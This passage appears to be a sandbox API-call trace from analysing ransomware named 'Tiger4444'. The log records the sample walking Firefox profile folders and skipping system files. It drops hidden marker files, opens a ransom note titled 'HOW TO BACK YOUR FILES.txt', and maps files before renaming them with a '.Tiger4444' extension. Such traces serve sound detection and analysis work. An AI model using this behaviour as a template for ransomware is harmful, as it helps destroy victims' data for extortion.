nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0051.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.597] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.597] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.597] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.597] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c4b15, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c52611, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.598] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.598] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.598] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.598] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.598] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.598] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c52611, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c52611, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83c52611, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.598] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.598] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.598] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40e6e0c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.6", cAlternateFileName="")) returned 1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="Tiger4444.exe") returned -1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2=".") returned 1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="..") returned 1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="windows") returned -1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="bootmgr") returned -1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="pagefile.sys") returned -1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="boot") returned -1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="ids.txt") returned -1 [0051.598] lstrcmpiW (lpString1="1.6", lpString2="NTUSER.DAT") returned -1 [0051.598] lstrcpyW (in: lpString1=0x30aeb5c, lpString2="1.6" | out: lpString1="1.6") returned="1.6" [0051.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0051.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xbc) returned 0xc5f6a8 [0051.598] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc665c8 [0051.598] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c5e7c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40e6e0c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.6", cAlternateFileName="")) returned 0 [0051.598] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0051.598] lstrcpyW (in: lpString1=0x30aeb5c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.600] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.600] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.600] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.600] CloseHandle (hObject=0x260) returned 1 [0051.600] CloseHandle (hObject=0x2ac) returned 1 [0051.600] GetCurrentThreadId () returned 0xfa8 [0051.600] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0051.600] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6" [0051.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5f6a8 | out: hHeap=0xc50000) returned 1 [0051.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0051.600] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6" [0051.600] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\" [0051.600] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3" [0051.601] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.623] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.625] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.626] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.626] CloseHandle (hObject=0x2ac) returned 1 [0051.626] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6") returned 93 [0051.626] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.626] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40e6e0c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c78a3d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0051.627] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.627] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.627] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.627] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.627] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40e6e0c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83c78a3d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.627] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.627] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.627] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.627] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.627] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.627] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83c78a3d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83c78a3d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83c9ec7d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.627] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.627] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.627] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c7227, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xcdbd0100, ftLastAccessTime.dwHighDateTime=0x1d1e9c5, ftLastWriteTime.dwLowDateTime=0xcdbd0100, ftLastWriteTime.dwHighDateTime=0x1d1e9c5, nFileSizeHigh=0x0, nFileSizeLow=0xd81c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmpopenh264.dll", cAlternateFileName="GMPOPE~1.DLL")) returned 1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="Tiger4444.exe") returned -1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2=".") returned 1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="..") returned 1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="windows") returned -1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="bootmgr") returned 1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="pagefile.sys") returned -1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="boot") returned 1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="ids.txt") returned -1 [0051.627] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="NTUSER.DAT") returned -1 [0051.627] lstrcpyW (in: lpString1=0x30aeb64, lpString2="gmpopenh264.dll" | out: lpString1="gmpopenh264.dll") returned="gmpopenh264.dll" [0051.627] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll", dwFileAttributes=0x0) returned 1 [0051.628] lstrlenW (lpString="gmpopenh264.dll") returned 15 [0051.628] lstrlenW (lpString="Tiger4444") returned 9 [0051.628] lstrcmpiW (lpString1="nh264.dll", lpString2="Tiger4444") returned -1 [0051.628] lstrlenW (lpString=".dll") returned 4 [0051.628] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0051.628] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40e6e0c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xc7554a80, ftLastAccessTime.dwHighDateTime=0x1d1e848, ftLastWriteTime.dwLowDateTime=0xc7554a80, ftLastWriteTime.dwHighDateTime=0x1d1e848, nFileSizeHigh=0x0, nFileSizeLow=0x74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmpopenh264.info", cAlternateFileName="GMPOPE~1.INF")) returned 1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="Tiger4444.exe") returned -1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2=".") returned 1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="..") returned 1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="windows") returned -1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="bootmgr") returned 1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="pagefile.sys") returned -1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="boot") returned 1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ids.txt") returned -1 [0051.628] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="NTUSER.DAT") returned -1 [0051.628] lstrcpyW (in: lpString1=0x30aeb64, lpString2="gmpopenh264.info" | out: lpString1="gmpopenh264.info") returned="gmpopenh264.info" [0051.628] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info", dwFileAttributes=0x0) returned 1 [0051.629] lstrlenW (lpString="gmpopenh264.info") returned 16 [0051.629] lstrlenW (lpString="Tiger4444") returned 9 [0051.629] lstrcmpiW (lpString1="h264.info", lpString2="Tiger4444") returned -1 [0051.629] lstrlenW (lpString=".dll") returned 4 [0051.629] lstrcmpiW (lpString1="info", lpString2=".dll") returned 1 [0051.629] lstrlenW (lpString=".lnk") returned 4 [0051.629] lstrcmpiW (lpString1="info", lpString2=".lnk") returned 1 [0051.629] lstrlenW (lpString=".ini") returned 4 [0051.629] lstrcmpiW (lpString1="info", lpString2=".ini") returned 1 [0051.629] lstrlenW (lpString=".sys") returned 4 [0051.629] lstrcmpiW (lpString1="info", lpString2=".sys") returned 1 [0051.629] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.629] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.629] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14308223369) returned 1 [0051.629] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=116) returned 1 [0051.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0051.629] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0051.629] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x380, lpName=0x0) returned 0x2c8 [0051.631] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x380) returned 0xbe0000 [0051.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0051.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0051.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0051.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0051.632] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14308529435) returned 1 [0051.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0051.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0051.632] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.632] CloseHandle (hObject=0x2c8) returned 1 [0051.632] CloseHandle (hObject=0x260) returned 1 [0051.632] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.Tiger4444") returned 120 [0051.632] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.tiger4444"), dwFlags=0x1) returned 1 [0051.634] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40e6e0c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xc7554a80, ftLastAccessTime.dwHighDateTime=0x1d1e848, ftLastWriteTime.dwLowDateTime=0xc7554a80, ftLastWriteTime.dwHighDateTime=0x1d1e848, nFileSizeHigh=0x0, nFileSizeLow=0x74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmpopenh264.info", cAlternateFileName="GMPOPE~1.INF")) returned 0 [0051.634] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0051.634] lstrcpyW (in: lpString1=0x30aeb64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.635] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.635] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.635] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.635] CloseHandle (hObject=0x260) returned 1 [0051.635] CloseHandle (hObject=0x2ac) returned 1 [0051.635] GetCurrentThreadId () returned 0xfa8 [0051.635] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0051.635] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp" [0051.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0051.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0051.635] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp" [0051.635] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\" [0051.635] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3" [0051.636] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.637] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.639] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.640] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.640] CloseHandle (hObject=0x2ac) returned 1 [0051.641] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp") returned 77 [0051.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.641] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdbd76e4, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, 